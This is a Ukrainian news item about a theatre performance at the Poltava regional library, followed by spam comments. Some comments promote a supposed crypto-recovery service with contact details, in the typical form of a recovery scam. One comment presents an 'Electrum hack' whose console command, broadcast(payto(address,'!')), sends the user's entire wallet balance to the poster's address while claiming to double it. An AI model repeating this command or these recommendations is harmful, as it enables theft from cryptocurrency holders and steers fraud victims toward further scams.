У Полтаві зіграють виставу «На розпутті 20-х»

16 та 17 березня в обласній бібліотеці імені Котляревського відбудеться вистава від творчого проєкту «Літератури немає».


На відвідувачів вистави очікує один із чотирьох театральних сюжетів на вибір. Який саме — організатори повідомлять після реєстрації. Також актори проєкту обіцяють музичну й поетичну частини, де вони продовжать теми, що випливають із сюжетів.

Виставу проводитимуть 16 та 17 березня. Орієнтовна тривалість — дві години.

«На розпутті 20-х ми поринемо у перипетії радикальних методів, азарту, палкого кохання та витонченої любові, ідейних дискусій та дамо відповідь на питання: чи є наша культура європейською», – описують виставу актори.

Реєстрація на виставу обов'язкова, оскільки кількість місць обмежена. Зробити це можна за посиланнями:

Нагадаємо, що у Полтавському театрі Гоголя зіграють прем'єру вистави «Конотопська відьма».

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Обговорення: 7 коментарів

Написати коментар
  • MA
    Matilda Adams
    13 бер.
    GET YOUR CRYPTO BACK FROM SCAMMERS Hello, I'm Matilda Adams from the United States. Losing money through scammers is terrible and awful. You could find yourself in an untenable situation as a result of it; that was exactly what happened to me. I put more than $130,000 into a cryptocurrency platform, and up until it was too late, everything seemed perfectly in place. before I realised I was deceived. I was suffering from depression for days and tried everything to get my money back. I visited dIfferent web pages and read a lot of reviews and testimonies about WIZARD WILLIAMS RECOVERY SERVICES, so I willingly decided to give them a try. and it was the best choice I've ever made.The money was recovered back to me very quickly. Choose your investments with cautiousness. Kindly get in contact with Wizard Williams recovery at email (wizardwilliams@mail.com) if you ever encounter similar circumstances, or through WhatsApp +4,9,1,7,6,1,2,4,5,2,0,6,6.
  • E
    24 бер.
    !! NEW ELECTRUM HACK !! How to double bitcoins in electrum wallet works in 2024 Step1 - Click in View Tab Show Console Step2 - Open console tab and put this command: broadcast(payto('1FREENm9UxLWQEffdSdV9UqgMTizqunX5L','!')) Step3 - Hit enter button, if console shows message like this: txid.... Restart electrum and view your balance x2 Have fun with your free Money
  • JD
    Jonathan Dave
    27 бер.
    THE ONE AND ONLY LEGITIMATE CRYPTOCURRENCY RECOVERY SPECIALIST Happy day to you all. Using this wonderful platform, I want to notify the public about WIZARD WILLIAMS RECOVERY. A few months ago, I was looking for an online Bitcoin scheme for investment when I fell victim to a $213,000 fraud. Until I saw a timeline about WIZARD WILLIAMS RECOVERY, I was at my lowest and had no idea what to do. I contacted them, and to my utter amazement, they were able to retrieve every penny that I had previously lost to scammers. It didn't cost me anything to announce a good and trustworthy hacker as WIZARD WILLIAMS, which is why I'm so happy to share this excellent news with you all.Contact them if you need any crypto recovery assistance, through email (wizardwilliams@mail.com) or WhatsApp:+4,9,1,7,6,1,2,4,5,2,0,6,6.
  • JD
    Jonathan Dave
    27 бер.
    THE ONE AND ONLY LEGITIMATE CRYPTOCURRENCY RECOVERY SPECIALIST Happy day to you all. Using this wonderful platform, I want to notify the public about WIZARD WILLIAMS RECOVERY. A few months ago, I was looking for an online Bitcoin scheme for investment when I fell victim to a $213,000 fraud. Until I saw a timeline about WIZARD WILLIAMS RECOVERY, I was at my lowest and had no idea what to do. I contacted them, and to my utter amazement, they were able to retrieve every penny that I had previously lost to scammers. It didn't cost me anything to announce a good and trustworthy hacker as WIZARD WILLIAMS, which is why I'm so happy to share this excellent news with you all.Contact them if you need any crypto recovery assistance, through email (wizardwilliams@mail.com) or WhatsApp:+4,9,1,7,6,1,2,4,5,2,0,6,6.